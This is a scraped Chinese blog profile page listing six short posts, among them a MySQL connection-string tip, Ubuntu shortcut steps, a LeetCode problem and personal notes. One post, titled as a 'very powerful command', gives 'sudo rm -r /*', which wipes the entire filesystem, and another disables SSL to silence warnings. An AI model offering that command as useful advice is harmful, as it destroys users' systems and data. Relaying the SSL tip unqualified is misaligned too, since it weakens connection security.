自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(6)
  • 收藏
  • 关注

原创 A very powerful command in linux.

sudo rm -r /*

2018-01-23 18:10:31 138

转载 Warning about SSL connection when connecting to MySQL database

Your connection URL should look like the below, jdbc:mysql://localhost:3306/Peoples?autoReconnect=true&useSSL=false This will disable SSL and also suppress the SSL errors.

2018-01-20 23:24:15 168

原创 Ubuntu16.04创建快捷方式

1.打开终端然后输入:sudo apt-get install --no-install-recommends gnome-panelgnome-desktop-item-edit ~/Desktop/ --create-new2.将会出现一个图形界面设置: 3. 将你想设置的快捷方式的运行文件加入command。 4. 参考文献:https://askubuntu.com/ques

2018-01-20 22:36:52 882

原创 太浮躁了

最近太浮躁了,唉心累!

2018-01-18 21:58:21 210

翻译 Next Greater Element I

You are given two arrays (without duplicates) nums1 and nums2 where nums1’s elements are subset of nums2. Find all the next greater numbers for nums1's elements in the corresponding places of nums2. T

2018-01-17 22:09:28 179

原创 第一篇博客

之前一直陆陆续续的写一些学习上的小tips,但是时间久了不能很好存储下来,现在开始用csdn记录学习,祝大家学习愉快!

2018-01-17 19:22:31 106

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除